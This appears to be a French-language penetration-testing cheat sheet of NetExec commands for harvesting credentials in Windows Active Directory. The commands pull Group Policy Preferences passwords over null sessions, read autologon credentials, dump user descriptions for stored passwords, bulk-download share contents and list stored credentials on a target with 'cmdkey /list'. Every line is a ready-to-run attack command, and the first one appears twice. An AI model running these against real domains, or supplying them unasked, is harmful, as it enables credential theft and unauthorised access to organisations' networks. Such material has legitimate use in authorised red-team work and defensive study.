Copy command
nxc smb $DC -u '' -p '' -M gpp_passwordDescription: GPP passwords en null session : ne nécessite pas de creds si SYSVOL est accessible.
Pre-Exploitation
Trouver des credentials exposés avant d'avoir besoin d'exploiter quoi que ce soit.
nxc smb $DC -u '' -p '' -M gpp_passwordDescription: GPP passwords en null session : ne nécessite pas de creds si SYSVOL est accessible.
nxc smb $DC -u $USER -p $PASS -M gpp_autologinDescription: AutoLogon credentials dans les GPP : souvent des comptes de service ou admin.
nxc ldap $DC -u $USER -p $PASS -M get-desc-usersDescription: Descriptions des utilisateurs : fréquemment utilisées pour stocker des passwords initiaux.
nxc smb $TARGET -u $USER -p $PASS --shares -M spider_plus -o DOWNLOAD_FLAG=TrueDescription: Télécharger tous les fichiers des partages pour chercher des configs avec credentials.
nxc smb $TARGET -u $USER -p $PASS -x 'cmdkey /list'Description: Lister les credentials Windows stockés (cmdkey) sur la machine cible.